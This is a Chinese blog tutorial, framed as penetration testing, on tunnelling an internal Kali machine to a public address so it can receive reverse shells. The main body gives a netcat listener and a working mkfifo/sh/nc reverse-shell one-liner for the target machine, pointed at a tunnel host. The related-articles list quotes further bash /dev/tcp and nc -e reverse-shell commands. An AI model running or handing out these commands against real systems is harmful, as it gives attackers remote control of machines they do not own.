内网kali 通过内网穿透反弹shell

已于 2023-09-12 14:52:51 修改
阅读量1.1k 收藏 13
点赞数 2
分类专栏: kali linux 工具 文章标签: linux 运维 服务器
于 2023-05-21 17:06:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/127101003
版权

通常我们kali都是安装在虚拟机上的,且在内网,但是通常在真实的渗透测试中,我们的kali需要有个公网ip来反弹shell,如何实现呢,接下来就给大家介绍一款我常用的工具

1、https://console.uulap.com/ 注册登录控制台

2、如图开通一个免费的隧道

在这里插入图片描述

3.在kali下载客户端

wget https://www.uulap.com/download/nattunnel.linux.amd64/nattunnel
在这里插入图片描述

4.启动客户端

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
看到下图,说明已经映射成功
在这里插入图片描述

5.尝试通过nc 反弹获取shell

本地监听4444端口
nc -lvp 4444
在这里插入图片描述
再目标机执行
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc s0.z100.vip 4787 >/tmp/f
各种反弹代码可再这里生成
在这里插入图片描述
可以看到,shell已经成功反弹回来了
在这里插入图片描述

丢了少年失了心1
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
frp内网穿透—将kali代理在公网中进行渗透测试
monster663的博客
09-10 5927
frp内网穿透,通过frp将kali虚拟机端口映射到公网IP端口上,更好的解决利用kali对公网IP展开测试的问题
关于内网穿透真实案例讲解
qq_36585338的博客
02-13 845
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 Kali 0x006内网穿透—数据转发 ​ GitHub - shellfeel/Ant-AntV: 一个经过实战考验的免杀程序生成器 MSF监听会话
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6060
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹shell常见方法总结
qq_45746681的博客
10-08 726
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9433
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
kali渗透内网和外网
weixin_62693307的博客
04-17 6077
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用。这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网。
内网渗透之反弹shell
weixin_41038905的博客
01-31 874
蚕吐丝,蜂酿蜜,人不学,不如物! 场景1 步骤一:将被控服务器shell反弹到本地的4444端口,并监听4444端口(受害机输入) nc -lvp 4444 -e cmd.exe (反弹windows shell) nc -lvp 4444 -e /bin/bash (反弹linux shell) 步骤二:攻击机连接被控服务器的4444端口(攻击机输入) nc -nv 受害机ip 4444 场景2 2利用nc反弹shell 条件:防火墙开启,不允许访问目标端口(可直接关闭目标机防火墙,权限
内网渗透综合实验.docx
08-29
本文档主要讲解了内网渗透综合实验的相关知识点,包括内网通信、隧道通信、Powercat 和 nc 反弹 shell、DNS 隧道、ssh 隧道等。 一、内网通信 内网通信是指在局域网内部的计算机之间进行数据交换的过程。在本实验...
浅析Linux之bash反弹shell原理
01-08
攻击机 kali 成功反弹shell 原理 反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起...
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-21
通过SSH的本地端口转发,小黑可以在本地计算机(Kali Rolling,192.168.160.140)上设置一个端口(例如11001),并将该端口的流量转发到跳板机(Ubuntu18,192.168.160.137),再由跳板机转发到目标机(Windows7,...
[Kali Linux]入门:内网穿透的教程和实战(很适合入门|附图)
MSB_WLAQ的博客
10-07 5148
hello 各位freebuf的铁铁,我是白面安全猿,我又来发表文章了。因为最近有好多网友问我关于内网穿透的事情,所以打算写一篇教程尽量教会各位刚入门kali的新手和没有具体了解过内网穿透的老手内网穿透! 我这个人也不喜欢搞什么花里胡少的东西,原理我就不多说了,说了新手理解起来比较吃力,都是从那一步来的都知道。如果想要具体去了解内网穿透原理的话可以去看看其他博主的文章。 首先想要内网穿透的话必须先要用到内网穿透的工具,很多第三方都提供了内网穿透的工具,比如花生壳啊或者飞鸽啊等等,那么我这里推荐一下sun
Kali Linux渗透测试——提权
Captain_RB的博客
03-03 4266
Kali Linux渗透测试——提权 笔记内容参考安全牛苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——提权一、关于权限(一)WindowsNT(二)Linux 一、关于权限 对不同的用户设置合适的权限是保证多任务操作系统安全的重要一环,取得shell并拿到系统权限,就相当于完全掌握了攻击目标的控制权。设置用户权限的一个基本原则即:设置最少的服务,分配最小...
Kali 工具系列【6】msf公网监听弹回本地
司徒荆的博客
06-14 2794
Kali 工具系列【6】msf公网监听弹回本地
内网渗透-反弹shell的N种姿势
最新发布
lza20001103的博客
04-15 961
内网渗透-反弹shell的N种姿势
Linux配合宝塔面板使用量子互联内网穿透的最新教程
高艳艳的博客!
03-24 371
Linux配合宝塔面板使用量子互联内网穿透的最新教程
内网kali映射到公网实现访问
afei001
11-01 3603
实验工具 GateOne ngrok 实验目的     将内网中web端的kali映射到公网,通过公网访问特定的域名就能登录到内网中的kali 1.GateOne简介      GateOne是一款使用HTML5技术编写的网页版 SSH 终端模拟器。基于现代的HTML5 技术,无需任何浏览器插件、支持多个SSH 进程、可以嵌入到其他任意应用程序中、支持使用 JavaScript、Python甚至...
内网渗透之Linux反弹shell(综合)
墨鱼菜鸡
09-10 1364
目录 知识点 Linux mkfifo命令基本用法 1.首先了解linux命令执行顺序 2.然后了解下管道命令(pipe) 3.常见管道命令 4.mkfifo则可以创建命名管道 Linux标准文件描述符 更改标准输出的位置 更改标准输入的位置 /dev/null 重定向 输入重定向 输出重定向 管道 环境 01NC正向Sh...
kali 安装cpolar内网穿透实现 ssh 远程连接
小吉妙妙屋
09-05 2323
简单几步通过cpolar 内网穿透软件实现ssh 远程连接kali!
kali frp内网穿透
07-28
Kali Linux上使用FRP进行内网穿透,可以按照以下步骤进行操作: 1. 下载FRP:首先,你需要从FRP的官方网站(https://github.com/fatedier/frp)上下载适用于Kali Linux的FRP客户端。 2. 配置FRP:解压下载的FRP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值